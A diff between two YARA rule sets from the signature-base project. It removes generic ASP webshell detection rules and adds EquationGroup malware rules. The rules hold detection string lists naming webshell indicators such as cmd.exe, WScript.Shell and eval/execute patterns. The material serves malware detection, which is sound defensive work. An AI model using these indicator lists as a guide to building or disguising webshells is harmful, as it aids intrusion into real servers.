+		$s5 = "Corporation. All rights reserved." fullword wide
 
 	condition:
-		filesize < 200KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and any of ( $asp_string* )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Sniffer : FILE
+rule SIGNATURE_BASE_Equationgroup_DXGHLP16 : FILE
 {
 	meta:
-		description = "ASP webshell which can sniff local traffic"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b5704c19-fce1-5210-8185-4839c1c5a344"
-		date = "2021-03-14"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L4060-L4195"
+		description = "EquationGroup Malware - file DXGHLP16.SYS"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d9e39c22-f606-5d9c-a5e2-e536b8566595"
+		date = "2017-01-13"
+		modified = "2023-01-06"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1681-L1702"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1206c22de8d51055a5e3841b4542fb13aa0f97dd"
-		hash = "60d131af1ed23810dbc78f85ee32ffd863f8f0f4"
-		hash = "c3bc4ab8076ef184c526eb7f16e08d41b4cec97e"
-		hash = "ed5938c04f61795834751d44a383f8ca0ceac833"
-		logic_hash = "874ec4c5dff024a899976e46cd553b52c361779a5507cf08ff0de596fd460d41"
+		logic_hash = "5244cef876af4c0c02109599e6250254c854ed5c9bd2d0ccc44676dca21a1650"
 		score = 75
-		quality = -24
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "fcfb56fa79d2383d34c471ef439314edc2239d632a880aa2de3cea430f6b5665"
 
 	strings:
-		$sniff1 = "Socket(" wide ascii
-		$sniff2 = ".Bind(" wide ascii
-		$sniff3 = ".SetSocketOption(" wide ascii
-		$sniff4 = ".IOControl(" wide ascii
-		$sniff5 = "PacketCaptureWriter" fullword wide ascii
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
-		$asp_input1 = "request" fullword nocase wide ascii
-		$asp_input2 = "Page_Load" fullword nocase wide ascii
-		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
-		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
-		$asp_xml_method1 = "GET" fullword wide ascii
-		$asp_xml_method2 = "POST" fullword wide ascii
-		$asp_xml_method3 = "HEAD" fullword wide ascii
-		$asp_form1 = "<form " wide ascii
-		$asp_form2 = "<Form " wide ascii
-		$asp_form3 = "<FORM " wide ascii
-		$asp_asp = "<asp:" wide ascii
-		$asp_text1 = ".text" wide ascii
-		$asp_text2 = ".Text" wide ascii
+		$s1 = "DXGHLP16.SYS" fullword wide
+		$s2 = "P16.SYS" fullword ascii
+		$s3 = "\\Registry\\User\\CurrentUser\\" wide
+		$s4 = "\\DosDevices\\%ws" wide
+		$s5 = "\\Device\\%ws_%ws" wide
+		$s6 = "ct@SYS\\DXGHLP16.dbg" fullword ascii
+		$s7 = "%ws%03d%ws%wZ" fullword wide
+		$s8 = "TCP/IP driver" fullword wide
+		$s9 = "\\Device\\%ws" wide
 
 	condition:
-		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and filesize < 30KB and all of ( $sniff* )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Generic_Tiny : FILE
+rule SIGNATURE_BASE_Equationgroup_Equationdrug_Msgkd : FILE
 {
 	meta:
-		description = "Generic tiny ASP webshell which uses any eval/exec function indirectly on user input or writes a file"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0904cefb-6e0f-5e5f-9986-cf83d409ce46"
-		date = "2021-01-07"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L4197-L4404"
+		description = "EquationGroup Malware - file msgkd.ex_"
+		author = "Florian Roth (Nextron Systems)"
+		id = "41019119-9bf4-5a45-b74b-f75ab7738821"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1704-L1718"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "990e3f129b8ba409a819705276f8fa845b95dad0"
-		hash = "52ce724580e533da983856c4ebe634336f5fd13a"
-		hash = "0864f040a37c3e1cef0213df273870ed6a61e4bc"
-		hash = "b184dc97b19485f734e3057e67007a16d47b2a62"
-		logic_hash = "62012312876adb97f24ff39af041263d7678a4264374398907b2442731e586d7"
+		logic_hash = "60336294ef5fa0221fc6a0e8b05bb279ac0e167024568cd9efa78e678e763704"
 		score = 75
-		quality = -102
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "25eec68fc9f0d8d1b5d72c9eae7bee29035918e9dcbeab13e276dec4b2ad2a56"
 
 	strings:
-		$fp1 = "net.rim.application.ipproxyservice.AdminCommand.execute"
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
-		$asp_input1 = "request" fullword nocase wide ascii
-		$asp_input2 = "Page_Load" fullword nocase wide ascii
-		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
-		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
-		$asp_xml_method1 = "GET" fullword wide ascii
-		$asp_xml_method2 = "POST" fullword wide ascii
-		$asp_xml_method3 = "HEAD" fullword wide ascii
-		$asp_form1 = "<form " wide ascii
-		$asp_form2 = "<Form " wide ascii
-		$asp_form3 = "<FORM " wide ascii
-		$asp_asp = "<asp:" wide ascii
-		$asp_text1 = ".text" wide ascii
-		$asp_text2 = ".Text" wide ascii
-		$dex = { 64 65 ( 78 | 79 ) 0a 30 }
-		$pack = { 50 41 43 4b 00 00 00 02 00 }
-		$asp_payload0 = "eval_r" fullword nocase wide ascii
-		$asp_payload1 = /\beval\s/ nocase wide ascii
-		$asp_payload2 = /\beval\(/ nocase wide ascii
-		$asp_payload3 = /\beval\"\"/ nocase wide ascii
-		$asp_payload4 = /:\s{0,10}eval\b/ nocase wide ascii
-		$asp_payload8 = /\bexecute\s?\(/ nocase wide ascii
-		$asp_payload9 = /\bexecute\s[\w"]/ nocase wide ascii
-		$asp_payload11 = "WSCRIPT.SHELL" fullword nocase wide ascii
-		$asp_payload13 = "ExecuteGlobal" fullword nocase wide ascii
-		$asp_payload14 = "ExecuteStatement" fullword nocase wide ascii
-		$asp_payload15 = "ExecuteStatement" fullword nocase wide ascii
-		$asp_multi_payload_one1 = "CreateObject" nocase fullword wide ascii
-		$asp_multi_payload_one2 = "addcode" fullword wide ascii
-		$asp_multi_payload_one3 = /\.run\b/ wide ascii
-		$asp_multi_payload_two1 = "CreateInstanceFromVirtualPath" fullword wide ascii
-		$asp_multi_payload_two2 = "ProcessRequest" fullword wide ascii
-		$asp_multi_payload_two3 = "BuildManager" fullword wide ascii
-		$asp_multi_payload_three1 = "System.Diagnostics" wide ascii
-		$asp_multi_payload_three2 = "Process" fullword wide ascii
-		$asp_multi_payload_three3 = ".Start" wide ascii
-		$asp_multi_payload_four1 = "CreateObject" fullword nocase wide ascii
-		$asp_multi_payload_four2 = "TransformNode" fullword nocase wide ascii
-		$asp_multi_payload_four3 = "loadxml" fullword nocase wide ascii
-		$asp_multi_payload_five1 = "ProcessStartInfo" fullword nocase wide ascii
-		$asp_multi_payload_five2 = ".Start" nocase wide ascii
-		$asp_multi_payload_five3 = ".Filename" nocase wide ascii
-		$asp_multi_payload_five4 = ".Arguments" nocase wide ascii
-		$asp_always_write1 = /\.write/ nocase wide ascii
-		$asp_always_write2 = /\.swrite/ nocase wide ascii
-		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
-		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
-		$asp_cr_write1 = "CreateObject(" nocase wide ascii
-		$asp_cr_write2 = "CreateObject (" nocase wide ascii
-		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
-		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
+		$s1 = "KEysud" fullword ascii
+		$s2 = "XWWWPWS" fullword ascii
 
 	condition:
-		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and not 1 of ( $fp* ) and not ( uint16( 0 ) == 0x5a4d or $dex at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and ( filesize < 700 and ( ( any of ( $asp_payload* ) or all of ( $asp_multi_payload_one* ) or all of ( $asp_multi_payload_two* ) or all of ( $asp_multi_payload_three* ) or all of ( $asp_multi_payload_four* ) or all of ( $asp_multi_payload_five* ) ) or ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Generic : FILE
+rule SIGNATURE_BASE_Equationgroup_Runaschild_Lp : FILE
 {
 	meta:
-		description = "Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0904cefb-6e0f-5e5f-9986-cf83d409ce46"
-		date = "2021-03-07"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L4406-L4705"
+		description = "EquationGroup Malware - file RunAsChild_Lp.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f0623c3f-3a49-5cdf-89ea-2b3273fd8324"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1720-L1735"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75"
-		hash = "4cf6fbad0411b7d33e38075f5e00d4c8ae9ce2f6f53967729974d004a183b25c"
-		hash = "a91320483df0178eb3cafea830c1bd94585fc896"
-		hash = "f3398832f697e3db91c3da71a8e775ebf66c7e73"
-		logic_hash = "f3375e8162b0a108887aed95fa67546f324eb8e15faee92c33dc3031688620e0"
-		score = 60
-		quality = -151
+		logic_hash = "77bea554ead64f85f4efdc49f91ea3b24d1759ae9d91718d443938ab862b0191"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "1097e1d562341858e241f1f67788534c0e340a2dc2e75237d57e3f473e024464"
 
 	strings:
-		$asp_much_sus7 = "Web Shell" nocase
-		$asp_much_sus8 = "WebShell" nocase
-		$asp_much_sus3 = "hidded shell"
-		$asp_much_sus4 = "WScript.Shell.1" nocase
-		$asp_much_sus5 = "AspExec"
-		$asp_much_sus14 = "\\pcAnywhere\\" nocase
-		$asp_much_sus15 = "antivirus" nocase
-		$asp_much_sus16 = "McAfee" nocase
-		$asp_much_sus17 = "nishang"
-		$asp_much_sus18 = "\"unsafe" fullword wide ascii
-		$asp_much_sus19 = "'unsafe" fullword wide ascii
-		$asp_much_sus28 = "exploit" fullword wide ascii
-		$asp_much_sus30 = "TVqQAAMAAA" wide ascii
-		$asp_much_sus31 = "HACKED" fullword wide ascii
-		$asp_much_sus32 = "hacked" fullword wide ascii
-		$asp_much_sus33 = "hacker" wide ascii
-		$asp_much_sus34 = "grayhat" nocase wide ascii
-		$asp_much_sus35 = "Microsoft FrontPage" wide ascii
-		$asp_much_sus36 = "Rootkit" wide ascii
-		$asp_much_sus37 = "rootkit" wide ascii
-		$asp_much_sus38 = "/*-/*-*/" wide ascii
-		$asp_much_sus39 = "u\"+\"n\"+\"s" wide ascii
-		$asp_much_sus40 = "\"e\"+\"v" wide ascii
-		$asp_much_sus41 = "a\"+\"l\"" wide ascii
-		$asp_much_sus42 = "\"+\"(\"+\"" wide ascii
-		$asp_much_sus43 = "q\"+\"u\"" wide ascii
-		$asp_much_sus44 = "\"u\"+\"e" wide ascii
-		$asp_much_sus45 = "/*//*/" wide ascii
-		$asp_much_sus46 = "(\"/*/\"" wide ascii
-		$asp_much_sus47 = "eval(eval(" wide ascii
-		$asp_much_sus48 = "Shell.Users" wide ascii
-		$asp_much_sus49 = "PasswordType=Regular" wide ascii
-		$asp_much_sus50 = "-Expire=0" wide ascii
-		$asp_much_sus51 = "sh\"&\"el" wide ascii
-		$asp_gen_sus1 = /:\s{0,20}eval}/ nocase wide ascii
-		$asp_gen_sus2 = /\.replace\(\/\w\/g/ nocase wide ascii
-		$asp_gen_sus6 = "self.delete"
-		$asp_gen_sus9 = "\"cmd /c" nocase
-		$asp_gen_sus10 = "\"cmd\"" nocase
-		$asp_gen_sus11 = "\"cmd.exe" nocase
-		$asp_gen_sus12 = "%comspec%" wide ascii
-		$asp_gen_sus13 = "%COMSPEC%" wide ascii
-		$asp_gen_sus18 = "Hklm.GetValueNames();" nocase
-		$asp_gen_sus19 = "http://schemas.microsoft.com/exchange/" wide ascii
-		$asp_gen_sus21 = "\"upload\"" wide ascii
-		$asp_gen_sus22 = "\"Upload\"" wide ascii
-		$asp_gen_sus25 = "shell_" wide ascii
-		$asp_gen_sus29 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" fullword wide ascii
-		$asp_gen_sus30 = "abcdefghijklmnopqrstuvwxyz234567" fullword wide ascii
-		$asp_gen_sus31 = "serv-u" wide ascii
-		$asp_gen_sus32 = "Serv-u" wide ascii
-		$asp_gen_sus33 = "Army" fullword wide ascii
-		$asp_slightly_sus1 = "<pre>" wide ascii
-		$asp_slightly_sus2 = "<PRE>" wide ascii
-		$asp_gen_obf1 = "\"+\"" wide ascii
-		$fp1 = "DataBinder.Eval"
-		$fp2 = "B2BTools"
-		$fp3 = "<b>Failed to execute cache update. See the log file for more information" ascii
-		$fp4 = "Microsoft. All rights reserved."
-		$fp5 = "\"unsafe\"," ascii wide
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
-		$dex = { 64 65 ( 78 | 79 ) 0a 30 }
-		$pack = { 50 41 43 4b 00 00 00 02 00 }
-		$asp_input1 = "request" fullword nocase wide ascii
-		$asp_input2 = "Page_Load" fullword nocase wide ascii
-		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
-		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
-		$asp_xml_method1 = "GET" fullword wide ascii
-		$asp_xml_method2 = "POST" fullword wide ascii
-		$asp_xml_method3 = "HEAD" fullword wide ascii
-		$asp_form1 = "<form " wide ascii
-		$asp_form2 = "<Form " wide ascii
-		$asp_form3 = "<FORM " wide ascii
-		$asp_asp = "<asp:" wide ascii
-		$asp_text1 = ".text" wide ascii
-		$asp_text2 = ".Text" wide ascii
-		$asp_payload0 = "eval_r" fullword nocase wide ascii
-		$asp_payload1 = /\beval\s/ nocase wide ascii
-		$asp_payload2 = /\beval\(/ nocase wide ascii
-		$asp_payload3 = /\beval\"\"/ nocase wide ascii
-		$asp_payload4 = /:\s{0,10}eval\b/ nocase wide ascii
-		$asp_payload8 = /\bexecute\s?\(/ nocase wide ascii
-		$asp_payload9 = /\bexecute\s[\w"]/ nocase wide ascii
-		$asp_payload11 = "WSCRIPT.SHELL" fullword nocase wide ascii
-		$asp_payload13 = "ExecuteGlobal" fullword nocase wide ascii
-		$asp_payload14 = "ExecuteStatement" fullword nocase wide ascii
-		$asp_payload15 = "ExecuteStatement" fullword nocase wide ascii
-		$asp_multi_payload_one1 = "CreateObject" nocase fullword wide ascii
-		$asp_multi_payload_one2 = "addcode" fullword wide ascii
-		$asp_multi_payload_one3 = /\.run\b/ wide ascii
-		$asp_multi_payload_two1 = "CreateInstanceFromVirtualPath" fullword wide ascii
-		$asp_multi_payload_two2 = "ProcessRequest" fullword wide ascii
-		$asp_multi_payload_two3 = "BuildManager" fullword wide ascii
-		$asp_multi_payload_three1 = "System.Diagnostics" wide ascii
-		$asp_multi_payload_three2 = "Process" fullword wide ascii
-		$asp_multi_payload_three3 = "Start" fullword wide ascii
-		$asp_multi_payload_four1 = "CreateObject" fullword nocase wide ascii
-		$asp_multi_payload_four2 = "TransformNode" fullword nocase wide ascii
-		$asp_multi_payload_four3 = "loadxml" fullword nocase wide ascii
-		$asp_multi_payload_five1 = "ProcessStartInfo" fullword nocase wide ascii
-		$asp_multi_payload_five2 = ".Start" nocase wide ascii
-		$asp_multi_payload_five3 = ".Filename" nocase wide ascii
-		$asp_multi_payload_five4 = ".Arguments" nocase wide ascii
-		$asp_always_write1 = /\.write/ nocase wide ascii
-		$asp_always_write2 = /\.swrite/ nocase wide ascii
-		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
-		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
-		$asp_cr_write1 = "CreateObject(" nocase wide ascii
-		$asp_cr_write2 = "CreateObject (" nocase wide ascii
-		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
-		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
-		$tagasp_capa_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_capa_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_capa_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_capa_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_capa_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$s1 = "Privilege elevation failed" fullword wide
+		$s2 = "Unable to open parent process" fullword wide
+		$s4 = "Invalid input to lpRunAsChildPPC" fullword wide
 
 	condition:
-		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and not ( uint16( 0 ) == 0x5a4d or $dex at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and ( any of ( $asp_payload* ) or all of ( $asp_multi_payload_one* ) or all of ( $asp_multi_payload_two* ) or all of ( $asp_multi_payload_three* ) or all of ( $asp_multi_payload_four* ) or all of ( $asp_multi_payload_five* ) ) and not any of ( $fp* ) and ( ( filesize < 3KB and ( 1 of ( $asp_slightly_sus* ) ) ) or ( filesize < 25KB and ( 1 of ( $asp_much_sus* ) or 1 of ( $asp_gen_sus* ) or ( #asp_gen_obf1 > 2 ) ) ) or ( filesize < 50KB and ( 1 of ( $asp_much_sus* ) or 3 of ( $asp_gen_sus* ) or ( #asp_gen_obf1 > 6 ) ) ) or ( filesize < 150KB and ( 1 of ( $asp_much_sus* ) or 4 of ( $asp_gen_sus* ) or ( #asp_gen_obf1 > 6 ) or ( ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) and ( 1 of ( $asp_much_sus* ) or 2 of ( $asp_gen_sus* ) or ( #asp_gen_obf1 > 3 ) ) ) ) ) or ( filesize < 100KB and ( any of ( $tagasp_capa_classid* ) ) ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Generic_Registry_Reader : FILE
+rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_6 : FILE
 {
 	meta:
-		description = "Generic ASP webshell which reads the registry (might look for passwords, license keys, database settings, general recon, ..."
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "02d6f95f-1801-5fb0-8ab8-92176cf2fdd7"
-		date = "2021-03-14"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L4707-L4854"
+		description = "EquationGroup Malware - file PC_Level3_dll_x64"
+		author = "Florian Roth (Nextron Systems)"
+		id = "99b2fab0-1298-5d48-a78b-eb59942ecfca"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1737-L1752"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4d53416398a89aef3a39f63338a7c1bf2d3fcda4"
-		hash = "f85cf490d7eb4484b415bea08b7e24742704bdda"
-		hash = "898ebfa1757dcbbecb2afcdab1560d72ae6940de"
-		logic_hash = "515bff52bebaad45481202ff934f8d1cbb79c27ccf47ca811077acacb7a47f13"
-		score = 50
-		quality = -28
+		logic_hash = "5a14bd8efe2cf68beec207e5deec28fd5b9d89c506593214eccbceae3cb862a7"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "339855618fb3ef53987b8c14a61bd4519b2616e766149e0c21cbd7cbe7a632c9"
 
 	strings:
-		$asp_reg2 = "LocalMachine" fullword wide ascii
-		$asp_reg3 = "ClassesRoot" fullword wide ascii
-		$asp_reg4 = "CurrentUser" fullword wide ascii
-		$asp_reg5 = "Users" fullword wide ascii
-		$asp_reg6 = "CurrentConfig" fullword wide ascii
-		$asp_reg7 = "Microsoft.Win32" fullword wide ascii
-		$asp_reg8 = "OpenSubKey" fullword wide ascii
-		$sus1 = "shell" fullword nocase wide ascii
-		$sus2 = "cmd.exe" fullword wide ascii
-		$sus3 = "<form " wide ascii
-		$sus4 = "<table " wide ascii
-		$sus5 = "System.Security.SecurityException" wide ascii
-		$fp1 = "Avira Operations GmbH" wide
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
